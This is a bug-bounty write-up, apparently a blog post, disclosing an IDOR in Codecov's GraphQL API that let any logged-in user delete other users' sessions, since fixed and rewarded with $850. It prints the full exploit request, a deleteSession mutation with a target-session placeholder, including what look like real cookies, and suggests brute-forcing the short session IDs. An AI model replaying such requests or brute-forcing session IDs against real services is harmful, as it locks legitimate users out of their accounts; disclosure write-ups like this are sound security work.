850$ IDOR:Unauthorized Session Revokation of any user

Hi Everyone, I’m thrilled to share another intriguing vulnerability I uncovered, this time in Codecov’s session management system. This vulnerability, an Insecure Direct Object Reference (IDOR), allows attackers to delete sessions of other users, leading to unauthorized session revocation. For this discovery, I was awarded a bounty of $850.

Understanding the Target: Codecov

Codecov is a popular code coverage tool that integrates with various continuous integration (CI) services, helping developers and organizations ensure code quality. It provides detailed coverage reports and facilitates the detection of code issues. However, a critical flaw in its session management system allows unauthorized users to terminate sessions of other users, disrupting their access to the platform.

The Vulnerability: Unauthorized Session Revocation

In Codecov, sessions are managed through GraphQL endpoints, allowing users to maintain continuous access to their accounts. I discovered that by manipulating certain parameters in the session management requests, an attacker could revoke the sessions of any user. This vulnerability is a prime example of an Insecure Direct Object Reference (IDOR), where direct access to objects is not properly secured, allowing unauthorized actions.

Understanding the Bug Type: Insecure Direct Object Reference (IDOR)

This vulnerability falls under Insecure Direct Object Reference (IDOR). IDOR occurs when an application exposes a reference to an internal object, such as a file or database key, in a way that allows unauthorized users to manipulate it and perform actions they shouldn’t be allowed to perform. In this case, Codecov’s GraphQL endpoint allows direct manipulation of session IDs, leading to unauthorized session termination.

Steps to Reproduce

Ensure you are logged in to the Codecov platform with a user account.Use the following HTTP POST request for the GraphQL endpoint (/graphql/gh) with the necessary parameters to delete a session:POST /graphql/gh HTTP/2
Host: api.codecov.io
Cookie: csrftoken=AEtIUAZfqtvzw8xQyIe4JWXdRUBqTIXq; sessionid=aqcpl41eemtojsxc5mvj3zona3gpkiuu; ajs_anonymous_id=c2c9aba0-4b31-425b-bba2-de417627ff54; _marketing_tags="utm_department=marketing&utm_source=direct"; session_expiry=2024-04-29T15:37:57.059539Z; _gcl_au=1.1.829559452.1713411868.314166038.1714398110.1714398109
Content-Length: 241
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Baggage: sentry-environment=production,sentry-public_key=63d24de2afa542ca8779d1ee5d395abc,sentry-trace_id=61bce3ab562546bb867b761e93f14c3f,sentry-sample_rate=0.2,sentry-sampled=true
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json; charset=utf-8
Accept: application/json
Token-Type: github-token
Sentry-Trace: 56d90707f39a4f569d78148fd442ffa5-b9b5169d5e118dea-1
Sec-Ch-Ua-Platform: "Linux"
Origin: https://app.codecov.io
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.codecov.io/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

{"query":"\n mutation DeleteSession($input: DeleteSessionInput!) {\n deleteSession(input: $input) {\n error {\n __typename\n }\n }\n }\n ","variables":{"input":{"sessionid": TARGET_SESSION_ID}}}

Substitute [TARGET_SESSION_ID] with the actual session ID of the target user.

The session IDs used by Codecov are relatively short, comprising only eight digits. This predictability makes them vulnerable to brute-force attacks, where an attacker can systematically guess or iterate through possible combinations to identify valid session IDs.

Submit the request to delete the target user’s session. A response indicating success means the session has been revoked.

Impact:

This vulnerability poses a significant security risk to Codecov users as it enables attackers to compromise the confidentiality, integrity, and availability of user accounts by revoking sessions of legitimate users. The primary impacts include:

Unauthorized Session Termination: Attackers can disrupt user access by revoking their sessions without proper authorization.Loss of User Control: Legitimate users lose control over their sessions.Denial of Service: The ability to terminate sessions can be used to deny users access to their accounts, impacting their ability to work effectively.

Response and Resolution

Upon discovering this vulnerability, I promptly reported it to the Codecov security team. The issue was reviewed, and I was awarded a bounty of $850 for identifying and reporting the flaw. Codecov is implemented a fix to ensure that session revocation actions are appropriately restricted and authenticated.

Support and Follow

If you found this write-up insightful, please leave a clap and share your feedback in the comments. Follow me for more exciting findings and cybersecurity tips!

Find me on Twitter: @a13h1_

Thank you for your continued support. Keep clapping, commenting, and sharing your thoughts!